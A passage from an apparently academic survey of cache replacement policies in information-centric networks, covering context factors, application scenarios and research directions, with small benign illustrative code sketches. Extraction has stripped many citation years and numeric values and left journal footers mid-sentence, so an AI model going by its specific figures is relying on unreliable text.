it is natural to expect that an increase in the cache size should increase the performance gain for any caching policy, since there is more space to store contents. in practice, the constraints of memory access speed or node devices' power will limit the cache size. however, evidence shows that the caching policies' performance gain is not linear in the cache size increase (han et al., ; chen et al., ; ong et al., ; sun et al., ; pires et al., ; mangili, martignon & capone, ). in this way, adding cache resources to the network may not be the most suitable solution to improve the performance. the observed effect arises because size allocation is a function of the content's popularity distribution. for example, in scenarios with large amounts of non-popular content, the cache size may be kept small because the gain from caching is restricted. on the contrary, for scenarios with a large amount of popular content, the benefits will be best achieved with larger cache sizes. in this way, balancing the optimal cache size in terms of cost and effectiveness of policies shall be done considering the fluctuations in content popularity.

table (condensed from the original layout; numeric values that were unreadable in the extracted text are omitted): scenarios concerning replacement policies evaluations with different effects on the policy choice. cr, content router.
- wang & bensaou ( a): internet-like topology with crs; edge and intermediate nodes; placement lce and pcp; eviction lru and the proposed edge and core policies; metrics hit rate, hit gain, and path stretch. effect [node-location]: different policies for different node locations; limited evaluation.
- li, simon & gravey ( ): internet-like topology with crs; edge and intermediate nodes; placement lce; eviction lru, lfu, and lrfu with multiple γ configurations; metrics hit rate and number of accesses to the server. effect [node-location]: different configurations of lrfu for different node locations.
- tarnoi et al. ( ): cascade topology with crs; edge and intermediate nodes; placement lce and prob; eviction lru, lfu, and random; metrics hit rate, server load, and round-trip hop distance. effects [node-location]: lru and random interchange positions for different node locations; [placement-policy]: different eviction policies for different placement policies.
- tarnoi et al. ( ): internet-like topology with crs; edge and intermediate nodes; placement lce and prob; eviction lru, lfu, and random; metrics hit rate, server load, and round-trip hop distance. effects [node-location] and [placement-policy] as above.
- gallo et al. ( ): tree topology with crs; edge and root nodes; placement lce; eviction lru and random; metric miss probability. effect [node-location]: lru and random interchange positions for different node locations.
- newberry & zhang ( ): data center fat-tree with crs; core, aggregation, and edge nodes; placement lce; eviction lru, q, arc, lirs, and mq; metric total network traffic. effects [node-location] and [cache-size]: different policies for different node locations, for different applications, and for different cache sizes.
- chao et al. ( ): eviction fcdc, lru, and ruf; metric hit rate. effect [cache-size]: lru and fcdc interchange positions for different cache sizes.
- wang et al. ( a): cascade topology with crs; placement lce and the ev placement; eviction lru, the ev replacement, and popu; metric energy efficiency. effect [cache-size]: different combinations of placement and replacement policies for different cache sizes.
- liu et al. ( b): tree topology with crs; edge and intermediate nodes; placement lce; eviction pbrs, lru, lfu, and fifo; metric hit rate. effect [cache-size]: lfu and pbrs interchange positions for different cache sizes.
- sun et al. ( ): internet-like topology with around k crs; edge, middle, and core nodes; placement lce, lcd, rand, prob, pprob, centrality, and cross; eviction lru, lfu, fifo, ttl, and size; metrics hit rate, traffic reduction, and server load reduction. effects [cache-size] and [placement-policy]: different eviction policies for different cache sizes and for different placement policies.
- chen et al. ( ): wireless mesh topology with crs; placement lce, lcp, lcd, and lcb; eviction lru, lfu, random, and fifo; metrics hit ratio and energy consumption. effect [placement-policy]: different eviction policies for different placement policies.

another observed effect of the relationship between cache size and replacement policy gain is that, as the relative cache size increases, the performance difference among the techniques decreases (charpinel et al., ; han et al., ; nakayama, ata & oka, ; bilal & kang, ; xing et al., ; panigrahi et al., ; li, simon & gravey, ; fricker et al., b; newberry & zhang, ). that means that the performances tend to converge eventually, and this is in line with che's approximation (che, tung & wang, ), which we briefly discuss here. the longest possible time between two sequential hits for a content c present in the cache, that is, before removing c from the cache, is expected to be random and related to c. that is the cache eviction time for content c. however, che's approximation states that, for reasonably large cache sizes, this cache eviction time tends to be deterministic, to the point of being a constant irrespective of the content. therefore, as the cache size increases, the dependence on c decreases and becomes negligible. following this direction, if the dependence on the content decreases, the dependence on the eviction policy decreases as well, because all contents converge to the same relevance in terms of eviction time. although che's approximation was proposed for a scenario with lru under the independent reference model (irm), other extensions and generalizations also show the approximation's validity in more scenarios (garetto, leonardi & martina, ; fricker, robert & roberts, a; araldo, rossi & martignon, ).
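as a purely illustrative aid (not taken from any of the surveyed works), the sketch below computes che's characteristic time for an lru cache under the irm with zipf popularity, by numerically solving sum over i of (1 - exp(-q_i * t)) = cache size, and then derives the per-content hit probabilities h_i = 1 - exp(-q_i * t). the catalog size, skew factor, and cache sizes are assumptions chosen only for the example.

import math

def zipf_probs(n_objects, alpha):
    """normalized zipf popularity distribution: q_i proportional to 1 / i**alpha."""
    weights = [1.0 / (i ** alpha) for i in range(1, n_objects + 1)]
    total = sum(weights)
    return [w / total for w in weights]

def che_characteristic_time(probs, cache_size, tol=1e-9):
    """solve sum_i (1 - exp(-q_i * t)) = cache_size for t by bisection."""
    assert cache_size < len(probs)            # otherwise every object fits and t diverges
    def expected_occupancy(t):
        return sum(1.0 - math.exp(-q * t) for q in probs)
    lo, hi = 0.0, 1.0
    while expected_occupancy(hi) < cache_size:   # grow the upper bound until it brackets
        hi *= 2.0
    while hi - lo > tol * hi:
        mid = (lo + hi) / 2.0
        if expected_occupancy(mid) < cache_size:
            lo = mid
        else:
            hi = mid
    return (lo + hi) / 2.0

probs = zipf_probs(n_objects=10_000, alpha=0.8)
for cache_size in (100, 1_000, 5_000):
    t_c = che_characteristic_time(probs, cache_size)
    hit_ratio = sum(q * (1.0 - math.exp(-q * t_c)) for q in probs)   # overall irm hit ratio
    print(f"cache size {cache_size}: characteristic time {t_c:.1f}, "
          f"approximate lru hit ratio {hit_ratio:.3f}")

the single characteristic time governs every content regardless of its popularity, which is one way to read the convergence of replacement policies' performance as the cache grows.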
cache placement policy
in icn, the in-path cache works as an opportunistic cache to distribute content along the network, and that opportunistic characteristic makes the distribution of caches over the network nodes and the content location choices more flexible. once there is a cache, though, the replacement scheme is mandatory for all cache nodes. nevertheless, both content placement and replacement decisions are closely correlated and influence each other's behavior. the decisions can be implemented separately and combined according to the network requirements. each combination of placement and replacement policies can lead to different behaviors. on the other hand, both placement and replacement strategies may complement each other. some of the replacement schemes reported in the icn literature are already coupled with a placement strategy (neves dos santos et al., ; sinky et al., ; ren et al., ; hu et al., ; pal & kant, ; xing et al., ; mick, tourani & misra, ; zhang, tan & li, b; wang et al., a; chen et al., ; khan & khan, ) and deployed in conjunction. in this work, we chose to look at the placement policy as a context factor that influences the replacement policy choice. this subsection presents the works (chen et al., ; tarnoi et al., ; sun et al., ) in which variations in the placement policies led to different choices of replacement schemes:
- chen et al. ( ) developed an icn wsn system in which they tested combinations of four placement strategies (lce, prob (i.e., lcp), lcd, and betw (i.e., lcb)) and four replacement policies (random, fifo, lfu, and lru) in a wsn with nodes. the results reveal a significant variation in the rank of policies for different combinations of placement policies and comparison metrics. considering the cache hit rate metric, lce and prob achieved their best results combined with lfu, while lcd and betw did so with random; yet, when considering the energy consumption metric, lce and prob achieved their best results with fifo, while lcd did so with lru, and lcb with random.
- in addition to analyzing the effect of heterogeneous policy configurations by node location, tarnoi et al. ( ) also analyzed variations in the replacement scheme choice according to the different placement policies. the work shows how the behavior of probabilistic caching placement varies as a function of the replacement scheme. the authors evaluated combinations of the lru, lfu, and random policies with lce and prob. in general, for both the cascade and internet-like topologies, and considering both the server load and the round-trip hop distance evaluation metrics, the results show that prob can improve the performance of the network and achieve its best performance only when combined with lru, while lce achieves its best performance in conjunction with lfu.
- finally, as we mentioned earlier, the results reported by sun et al. ( ) show that the optimal choice of the replacement scheme depends on the cache size and the placement policy. regarding the variations of placement policies, the work combined seven placement policies (lce, lcd, rand, prob, probcache, betw (i.e., cent), and crcache (i.e., cross)) with five replacement policies (lru, lfu, fifo, ttl, and size), and the results presented evidence of differences in the performance ranks for each combination. for example, considering the server load reduction metric and g of cache size, lce, rand, prob, and probcache achieved their highest values when combined with ttl, while lcd did so with fifo, betw with lru, and crcache with ttl or lru.
however, for cache sizes of g and t, all placement policies presented their best results with lfu, except for lcd, which achieved the best results combined with lru or ttl. the work also points to a dominant strategy among the compared ones in terms of caching metrics: partially in line with chen et al. ( ), and contrary to the analysis presented by tarnoi et al. ( ), the authors place prob + lfu as the closest to the best strategy for their scenario. however, the comparison between the different results is limited because the two works (chen et al., ; sun et al., ) did not mention the probability value used for caching contents, and the prob performance may vary according to the configured probability value.

reinforcing the intrinsic correlation between content placement and replacement decisions, all the works presented in this section show evidence of the different and unique effects of each combination of policies for distinct scenarios. different placement policies can be impacted differently when the replacement scheme changes (rezazad & tay, ; tarnoi et al., ; zhang et al., a; meddeb et al., ). this way, each placement strategy requires an evaluation of which replacement scheme performs better with it. each placement policy has a different requirement in terms of evictions, and the higher the number of evictions, the more the placement policy relies on the replacement scheme and, therefore, the more it is affected by it.

content: popularity
one of the behaviors we were expecting to find evidence for was the impact of content popularity variation on the replacement policy choice, especially on the choice between frequency-based policies, for example lfu, and others, like recency-based policies. that reasoning relies on the argument of many works that frequency-based policies better suit content populations with high popularity skewness, while populations with low popularity skewness would better suit other policies (beck et al., ). however, while analyzing the variations of popularity skewness during the comparative evaluation of the replacement schemes, we found works in which popularity skewness variations did not influence the policies' rank (wang et al., ; gür, ; huang et al., ; zhang, tan & li, ; an & luo, ; jeon, lee & song, ; shailendra et al., ; liu et al., ; tarnoi et al., ; gallo et al., ; yokota et al., ; zhang, tan & li, b; sinky et al., ; yao et al., ). those comprise works under a zipf popularity distribution, with different variations of the skew factor (from, for example, – ), with conventional policies like lru and lfu as well as newly proposed policies, but the performance rank among the policies remained unchanged.

variations in the skew factor represent variations in the distribution of the contents' popularity. an increase in the factor leads to an increase in the number of popular contents. it is also associated with the diversity among contents: the increase in the number of popular contents reduces the diversity of the contents stored in the caches, since popular contents are more likely to occupy cache space for relatively long times. also, we observed an effect similar to the cache size increase discussed earlier: under variations of the skew factor alone, as the skew factor increases, the difference in performance among the techniques decreases (badov et al., ; yokota et al., ; zhang, tan & li, b; zhang, tan & li, ; sinky et al., ; yao et al., ).
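to give a feel for what the skew factor does, the short sketch below (our own illustration, with an arbitrarily chosen catalog size and α values) prints how much of the total request mass falls on the top 1% of a zipf catalog as α grows; that concentration of popularity is what progressively makes different reasonable policies keep roughly the same objects.

def zipf_probs(n_objects, alpha):
    """normalized zipf popularity: probability of the i-th most popular object."""
    weights = [1.0 / (i ** alpha) for i in range(1, n_objects + 1)]
    total = sum(weights)
    return [w / total for w in weights]

n_objects = 10_000
top = n_objects // 100                      # the 1% most popular objects
for alpha in (0.6, 0.8, 1.0, 1.2):
    probs = zipf_probs(n_objects, alpha)
    mass_top = sum(probs[:top])
    print(f"alpha = {alpha}: top 1% of objects attract {mass_top:.1%} of the requests")

as α grows, a handful of objects dominates the request stream, so almost any sensible eviction scheme ends up retaining the same few objects, which is consistent with the convergence of policy ranks reported above.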
for instance, during the evaluation of the proposed ppc policy, zhang, tan & li ( ) carried out experiments varying the zipf skew factor from . to . . they compared the policy performance against lru, lfu, fifo, and ccp. the results reveal that, as the factor increases, the difference in cache hit ratio among the replacement schemes is reduced and tends to converge.

remaining remarks
this section presented many scenarios with evaluations of cache replacement policies that exhibited different behaviors according to variations in context. contextual factors are triggering this difference in performance, and this slr was able to identify some common factors in a set of works, as exposed in the previous subsections. the influence of some contextual factors was already evident when looking at individual works. however, one of our intentions with this slr was to analyze the works that had similar effects, to look for patterns that could relate the contextual factors to the policies' properties. that intention came up against the diversity of scenario characteristics and evaluated policies, which limited the analysis. besides, there was no in-depth analysis of why and how the effects happened; most of the works arrived at the evidence by testing the context variations, and small changes in the characteristics of the scenarios could have led to different results. in general, there was no explicit pattern in the surveyed works that associated the context factors with the policies or their properties. that also limited a more in-depth analysis from the perspective of the proportion of impacts for different contexts and scenarios, since the extent to which context characteristics affected cache replacement strategies varied for different scenarios. we must also highlight that most of the works did not indicate the confidence interval in their experiments. some of the differences between the policies' performance measurements were relatively small, and a confidence interval would help investigate the significance of those differences.

due to the reasons mentioned above, the policy choosing process cannot be reduced to rule-based schemes or related solutions. instead, the choosing process is suitable for solutions that dynamically analyze context factors and perform large-scale correlations between the factors and the policies, for example, with reinforcement learning techniques. at this point, we can already indicate, though, potential context characteristics to enhance the eviction performance in emergent icn scenarios. we present this analysis in the next section (applications).

lastly, we also highlight the overlooking of content negative-acknowledgment (content-nack) packets. in icns, content-nacks are special packets generated by content producers in response to requests for non-existent content. they can be encoded as data packets with a specific content-type feature. in that case, content-nacks are processed as regular data packets and cached in the network routers. although caching content-nacks is useful to respond efficiently to possible subsequent requests for the same non-existent content, it may insert vulnerability points in icn architectures (compagno et al., ). current eviction policies are not aware of content-nack packets, and there is a need to investigate whether this lack of awareness impacts cache management and security.
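one purely hypothetical direction, not proposed by any surveyed work, is to make the eviction logic aware of nack-typed entries and expire them ahead of regular data. the wrapper below sketches that idea around a plain lru store; the class name, the short nack lifetime, and the packet-type flag are all assumptions made only for illustration.

import time
from collections import OrderedDict

class NackAwareLRU:
    """lru-style cache that gives content-nack entries a short lifetime.

    hypothetical sketch: regular data entries follow plain lru, while entries
    flagged as nacks are also dropped once `nack_ttl` seconds have passed and
    are preferred as eviction victims when the cache overflows.
    """
    def __init__(self, capacity, nack_ttl=2.0):
        self.capacity = capacity
        self.nack_ttl = nack_ttl
        self.entries = OrderedDict()          # name -> (is_nack, inserted_at)

    def _purge_expired_nacks(self, now):
        expired = [name for name, (is_nack, t) in self.entries.items()
                   if is_nack and now - t > self.nack_ttl]
        for name in expired:
            del self.entries[name]

    def lookup(self, name):
        now = time.monotonic()
        self._purge_expired_nacks(now)
        if name in self.entries:
            self.entries.move_to_end(name)    # refresh recency on hit
            return True
        return False

    def insert(self, name, is_nack=False):
        now = time.monotonic()
        self._purge_expired_nacks(now)
        self.entries[name] = (is_nack, now)
        self.entries.move_to_end(name)
        if len(self.entries) > self.capacity:
            # prefer evicting the oldest nack before touching regular data
            for candidate, (is_nack_entry, _) in self.entries.items():
                if is_nack_entry:
                    del self.entries[candidate]
                    break
            else:
                self.entries.popitem(last=False)   # plain lru eviction otherwise

whether such special treatment actually helps cache management, or how it interacts with the attacks discussed by compagno et al., is exactly the open question raised above.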
nonetheless, a different approach is to question whether those packets should be cached in the network at all and how that choice could impact performance. when deciding not to cache them, the processing of content-nacks can be delegated to the cache placement policies, which can simply bypass these packets. this way, the content-nacks could follow the forwarding processing of data packets without being cached.

applications
the informational rfc (pentikousis et al., ) presented by the irtf-icnrg describes a set of application areas in which icn architectures can potentially perform better than the current host-centric internet approach. this technical document discusses diverse network contexts in emergent areas such as social networking, real-time communication, mobile networking, vehicular networking, delay- and disruption-tolerant networking (dtn), iot, and smart cities. thus, we extend the discussion to correlate characteristics of emergent networks with the context characteristics relevant to the choice of suitable cache replacement schemes. we highlight the most suitable context characteristics for generic network contexts on information-centric iot (arshad et al., ; dong & wang, ), vehicular named-data networking (khelifi et al., ), and icn-enabled edge and core networks (zhou et al., ; zhang et al., ) in the following subsections. table summarizes this discussion.

information-centric internet of things
the adoption of iot networks in many segments of society, like healthcare, transportation, security, industry, agriculture, communications, and infotainment, is gradually changing the way people interact with the physical world by connecting new things to the internet. things can be any device enhanced with sensing technology and the capability to generate and transmit data, and when aggregated with the intelligent services of iot applications, they can improve processes, business, and quality of life. the imminent revolution of iot applications must be followed by a revolution in how the network structure deals with the content. the current internet architecture is fundamentally not prepared to deal with the massive amount of data from an expected number of billions of heterogeneous devices. the majority of iot applications will be content-oriented, and tcp/ip will struggle to meet their bandwidth requirements. cache-enabled solutions like information-centric architectures are strong candidates to assist in the deployment of iot applications (arshad et al., ; quevedo, corujo & aguiar, ; dong & wang, ; araújo, de sousa & sampaio, ). the ubiquitous content caching of icn contributes to reducing the delay to retrieve content and enhances the contents' availability, especially when dealing with power-restricted devices that periodically switch on and off in duty cycling to save resources. in cache-enabled network solutions, iot traffic is usually offloaded at the internet content routers through a connected gateway (rao, schelen & lindgren, ; meddeb et al., ) to aggregate the services of specialized iot cloud platforms, such as cisco iot cloud connect, microsoft azure iot suite, and google cloud iot. also, the iot devices
table : suggestion of cache replacement policy category for different icn-enabled scenarios.
cache-enable network characteristics and/or requirements policy category correlation of requirements with context dimensions iot (smart home, home care…) high heterogeneity among iot devices with different priorities; high ephemerality of contents; limited resources content and node-based content features, like content provider identification, priority, and time-related properties vanets high intermittency of connections; multi- path propagation; different strategies for delay-sensitive data from safety applications and delay-tolerant data from infotainment applications content and node-based node location properties like mobility pattern plus direction, node’s rank according to topology position; content features, like type, priority, and popularity and time-related properties edge computing (small-cells radio access; g; device-to-device (d d) communication; unmanned aerial vehicles (uavs)) high temporal and spatial correlation of content requests; enables clusters by user similarities content and future human- based content popularity properties; user preferences, habits, and social interaction internet-scale networks globally content preferences; heterogeneous link/node capacities; long geographical distances content, node and network- based content feature and popularity properties; network topology, resource, and time- related properties; node resource and traffic properties pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ can cache the traffic in a dynamically distributed iot network (hahm et al., ). whether one case or another, two significant characteristics are a large number of heterogeneous devices and the ephemerality of the content produced by them. therefore, the suitable kind of cache replacement schemes for information-centric iots should deal with both characteristics. in the former, the different types of devices usually have different resources restrictions in terms of processing capabilities, memory, energy constraints, and they produce contents with different requirements regarding the context. for example, smart cities will need to integrate intelligent urban sensing services for many proposes, such as management of smart garbage collection, street lighting, parking, the monitoring of road conditions, urban noise, security cameras, and environmental conditions, among other possibilities. in this case, the infrastructure comprises a diversity of sensors with different content production rates and characteristics. the replacement scheme may apply different treatment to the contents according to the type of device by exploring both content and node context dimensions, with features like content provider identification, content priority, and node resource features. the latter characteristic points out the typical time-restricted data generated by some iot devices that periodically inform sensor measurements monitoring the environment. for example, the content periodically generated by temperature sensors and collected by distributed applications to monitor the ambient in urban areas can be usefully cached to serve user applications’ requests. however, the most recent measure will usually be of interest to most applications, and there is no need to maintain the previous measures in the cache. the replacement scheme should also combine time-related features of the content context dimension in the eviction process logic. 
the combinations of the features mentioned above can help detect redundant contents from the same producer while increasing the techniques for stale content detection. vehicular named-data networking vehicular networking exhibit singular characteristics in traffic generation patterns, delivery requirements, and spatial and temporal scope (pentikousis et al., ), mostly due to high node mobility, very intermittent connections, and the support for typical road- traffic-related applications (li et al., a), infotainment applications, and code dissemination (li, zhao & wong, b). in vehicular networking, the vehicles can exchange information with any other communication device available next to the vehicle in a concept of vehicle-to-everything (v x) communication. this includes communication between vehicle and other vehicles (vehicle-to-vehicle—v v), or road infrastructure (vehicle-to-infrastructure—v i), communication network structure (vehicle-to-network—v n), pedestrians (vehicle-to- pedestrian—v p), or any other communication device. in all those variations, the content requests usually present highly temporal/spatial dependencies, and the in-network caching capabilities of icns can potentially improve the content delivery process. regarding the caching strategy, the replacement scheme should consider the characteristics mentioned above because they can affect the local relevance of contents. for example, accident information’s relevance is highly dependent on the vehicle location and the direction towards it was moving (de sousa, araújo & sampaio, ). if the pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ vehicle has passed the accident, that information may no longer be useful. the replacement schemes can handle this decision with node location properties like mobility pattern, plus vehicle direction, and node’s rank according to the current topology position. different strategies should be applied to deal with the different types of applications combined with node location properties. for that, the strategy can explore content features, like content type and content priority. the road-traffic-related applications, such as road congestion notification, traffic monitoring, and accident warning, usually are delay- sensitive applications and are better handled by content time-related properties or even newly type-specific properties. similarly, applications for code dissemination designed to support smart city infrastructures’ upgrades can benefit from those properties. meanwhile, the infotainment applications are mostly delay-tolerant and more suitable to be handled by content popularity features. in-network cache-based data offloading through edge computing caching at the edge in mobile edge computing (mec) (safavat, naveen & rawat, ) will play an essential role in the next-generation wireless network. the radio access network (ran) is enhanced with cache capacity on base station structures to better attend the content demand due to its proximity. this way, small-cell base stations (sbs), macro-cell base stations (mbs), wi-fi access points (ap), mobile devices, and even recent cache-enabled uavs (zhang et al., ; ji et al., ; huang et al., ) can store contents and respond to the content requests faster. uavs can act as flying base stations to support the ground cellular network. they can also work as relay nodes to assist content delivery and data collection in areas without available transmission links. 
the integration with icn concepts leverages the mobile-edge caching by supporting in-network caching (zhou et al., ; psaras et al., ; shariat, tizghadam & leon-garcia, ). the imminent fifth-generation ( g) mobile networks also reinforces that merge as several initiatives discuss the benefit of the integration with icn (zhang et al., ; liang, yu & zhang, ). a fundamental characteristic created by the user’s closeness is a high temporal and spatial correlation of content requests. in this way, one of the widely explored approaches at the network edge is user-centric clustering techniques (ribeiro, sampaio & ziviani, ; he, wang & wang, ; elbamby et al., ). user characteristics are the input and motivation for virtual groupings, whether regarding the network structure or the users’ connection to the network. as a consequence, user and their content requests can be grouped according to user behavior patterns. due to the characteristics above, the replacement schemes for in-network caching at the edge can benefit from content-based properties, especially content popularity features, and the exploration of a variety of human properties related to preferences, habits, and social interaction. therefore, user behavior analysis is a relevant area in the future of edge- caching, fostering future human-based replacement policies. icn-enabled core network icn’s benefits encompass large-scale networks with backbone core nodes and high-speed links with different capacities, interconnecting heterogeneous autonomous systems pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ (as) with multiple access networks. in this way, core networks aggregate content requests from different access networks, and unlike the edge, the temporal/spatial correlation of requests is gradually reduced and becomes weaker as the content requests approach the core nodes. many solutions enhance icn’s applicability at core network structures for inter-domain network services such as routing (liu et al., a), traffic engineering (li et al., ), and globally accessible name schemes (van adrichem & kuipers, ). because of the considerable physical distances naturally presented in large-scale networks to connect content consumers and producers, requests typically have to traverse several nodes within the network. therefore, the network topology context must be taken into account to optimize cache replacement policies in content-based core nodes. context properties, in this case, are related to the distance connecting two end-nodes, like hop count, properties related to the network resources, like packet transmission cost, link capacity, and time-related features with network delay for retrieving content. the cache replacement schemes should also explore content and node contexts to reflect globally content preferences and the different capacities of core nodes, respectively. the content feature and popularity properties and node resource and traffic properties may further increment the replacement policies’ decision. on the other hand, there is a trade- off relating the performance while processing many context information, since core routers process requests at line speed. research directions in this section, we discuss different research directions for context-aware cache replacement schemes in icns. context information management dealing with contextual information requires well-defined procedures on acquiring, representing, reason, and distributing the information. 
context information management is widely studied and applied in many sciences that rely on context-awareness (perera et al., ). still, it is a challenge for complex systems such as dynamically distributed networks to efficiently perform online context management, especially when there is a need to represent a high number of dimensions and elements relevant to represent the domain. the integration between icn and sdns (kim, chung & moon, ; charpinel et al., ; yao et al., ; kalghoum, gammar & saidane, ; liu et al., ; saadeh et al., ) can further benefit context management solutions because of the sdn paradigm’s centralized control view. it is necessary to investigate what context information could be efficiently handled by central controlling. the sets of context features identified within our proposed classification are enablers to a semantic representation of the context domain and can be extended or adapted according to different application requirements. however, towards an efficient real-world deployment, there is also the need to argue about the quality of context information. quality can associate many aspects like reliability, precision, timeless, access right, significance, granularity, and completeness. those aspects are translated into metrics defined by the science of quality of context (qoc) (buchholz, küpper & schiffers, pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ ). the relevance of qoc metrics varies following the type of information. hence, different qoc metrics should follow the different context subcategories in each context dimension. scalability of context suitability exploring context information is essential to address a mismatch between caching policies and emerging networks. this exploration contributes to achieving more potentially precise and customized techniques. however, the more the use of contextual information, the more computationally expensive the caching scheme might become. the need to compute more context information may increase the complexity of the caching policy itself. therefore, it is essential to investigate the performance cost of individual context information and the solution as a whole. the performance cost depends not only on managing the information but also on how the policy treats the information. machine learning techniques in addition to being used for context information inference (zhao et al., ; nakayama, ata & oka, ; liu et al., ), machine learning techniques can investigate how to exploit better context information to optimize the eviction process. in one perspective, machine learning techniques could select which contextual information is most relevant and should shape the eviction process. the relevance of contextual information may vary depending on the network and objectives. this way, given a network with a set of available contextual information, it would help investigate how to choose what should be used by the eviction scheme to increase network performance. in another perspective, the techniques can direct the learning of the best kind of policy based on what context information is available. reinforcement learning techniques have been successfully applied for caching schemes (sung et al., ; sadeghi, sheikholeslami & giannakis, ). however, in those works, the context state is represented solely by the cached contents in an instant of time. 
it would be relevant to extend the concept of context to represent the state with more available information that would impact the learning policy process. depending on the number of context information used, there may be a large space of possible states, which will require considerable computational effort to represent the possible variations. when most of the states are rarely revisited, the chosen technique must deal with some sort of generalization. furthermore, model-free techniques are best indicated when there is no previous knowledge dataset to help the decision process. dynamic and adaptive instantiation of cache policies along with sdn and icn, network function virtualization (nfv) techniques are strong candidates for realizing and fostering next-generation networks (zhang et al., ; saadeh et al., ). through the network function virtualization concept, in-network caching strategies can quickly execute as virtual network function (vnf) along with some management structure. this combination paves the way for efficient deployment of pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ adaptive caching policies according to the context’s dynamic changes. to realize a plug- and-play vision of virtual function would be interesting to have a rich repository of heterogeneous caching functions and multi-attribute functions exploring different combinations of context information. human aspects in recent years, the community has witnessed a growing number of researches focused on solutions that exploit the human-user context to solve problems in different areas (shafigh et al., ; zaidi et al., ; zeng et al., ). due to mobile computing expansion, networking-related studies also tend to consider human aspects such as interactions, social ties, and personality to propose human-awareness solutions. this movement from device-to-device to people-to-people communication paradigm aims to look at network configurations taking into account the user’s perspective, integrating human perception approaches with qos metrics, and further, with the mapping of user behavioral profiles. network contexts are more likely to cope with group-based rather than individual user profiles. different user profiles, such as personality profiles, may reflect distinct patterns of how users in each profile interact with the network, and consequently, each profile may produce different impacts on the network resource consumption. therefore, the network can adapt according to the predominant user profiles to improve the distribution/consumption of resources and user qoe at the same time. in icn research, human factors present great potentials to improve the communication service delivery, in particular through adaptive caching solutions (ribeiro, sampaio & ziviani, ). one approach is to explore potential correlations between user characteristics and cache policies and adopt mechanisms for dynamically adapt the most suitable caching strategies to the predominant user behavior. a key challenging consists of finding out the human aspects that most positively impact the network efficiency and how they could be operatively explored in icn architectures. that requires a multidisciplinary view with the integration of psychology research to support lower granularity levels of user information. 
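picking up the reinforcement-learning direction discussed above, the toy sketch below is entirely our own illustration: the state features, the action set of eviction policies, and the epsilon-greedy parameters are assumptions, and a real proposal would need richer state representation, generalization across contexts, and a proper reward signal measured from the network. it only shows the shape a contextual, bandit-style selector of replacement policies could take.

import random

class PolicySelector:
    """toy epsilon-greedy learner mapping a discretized context to an eviction policy."""
    def __init__(self, policies, epsilon=0.1):
        self.policies = list(policies)        # e.g., ["lru", "lfu", "random"]
        self.epsilon = epsilon
        self.values = {}                      # (context, policy) -> running value estimate
        self.counts = {}                      # (context, policy) -> number of observations

    def choose(self, context):
        if random.random() < self.epsilon:
            return random.choice(self.policies)               # explore
        scored = [(self.values.get((context, p), 0.0), p) for p in self.policies]
        return max(scored)[1]                                  # exploit the best-known policy

    def update(self, context, policy, reward):
        key = (context, policy)
        self.counts[key] = self.counts.get(key, 0) + 1
        old = self.values.get(key, 0.0)
        self.values[key] = old + (reward - old) / self.counts[key]   # incremental mean

# hypothetical usage: the context bucket could encode node location and popularity skew,
# and the reward could be the hit ratio measured over the last monitoring interval.
selector = PolicySelector(["lru", "lfu", "random"])
context = ("edge", "high-skew")
policy = selector.choose(context)
observed_hit_ratio = 0.42          # would come from measurements in a real deployment
selector.update(context, policy, observed_hit_ratio)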
privacy in-network cache aggregates benefits to icn architectures by reducing bandwidth consumption and the latency to deliver contents over the network, but it also introduces architectural vulnerabilities regarding cache privacy (acs et al., ). for example, in side-channel timing attacks, a malicious user can deduce what content was accessed recently by another user on the same network by merely measuring content delivery times with standard content requests. acs et al. ( ) discussed techniques for mitigating privacy caching attacks in which contents marked as private could have different treatments by the cache management mechanism. one countermeasure presented to inhibit the timing attack consists of the insertion of artificial delay times in the content delivery process, so the malicious user cannot differentiate which content was retrieved from the cache or directly from the producer. pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ recent efforts from the ndn research community have tried to address many of the current privacy concerns (compagno et al., ; dogruluk et al., ), but more work lies ahead concerning the context information processed by caching strategies. the use of context information to allow the dynamic adoption of the most appropriate cache policy may require the processing of sensitive data of related users stored in communication devices. one major concern resides in guaranteeing the anonymity of data processed, particularly involving users for privacy-preserving cache management. similarly, there is a concern about the privacy of cache management strategies adopted on the network routers. fan et al. ( ) recently presented a method capable of detecting the placement policy configured in the routers. as described in the malicious attempt to discover the previously accessed content in the network, the method does not require any privileged access and can infer a placement policy through ordinary content requests. knowing the strategies used for content management can enhance the inference mechanisms of accessed content. conclusions this article presented a comprehensive and systematic review of studies regarding cache replacement policies in icns. the literature presents a vast set of eviction strategies exploiting combinations of multi-dimension aspects of context information in different ways, aiming at making more customized and effective decisions about the relevance of contents. thus, among its findings, the slr showed the relevance of considering context’s properties in choosing suitable replacement policies. the study revealed that efficient utilization of cache resources in icns relies on deploying cache replacement policies according to the network contexts. the slr contributes to characterize the context factors correlated with the caching policies and the reported effect of context variations on cache replacement policies’ performance. the compilation of evidence shows no single context factor determining the choice of policies; there is no explicit pattern regarding context properties variations to support the choosing process of policies for different network contexts. the results reaffirm the absence of a single optimal strategy to meet the requirements of all network since the caching policies’ performances vary according to different context characteristics. 
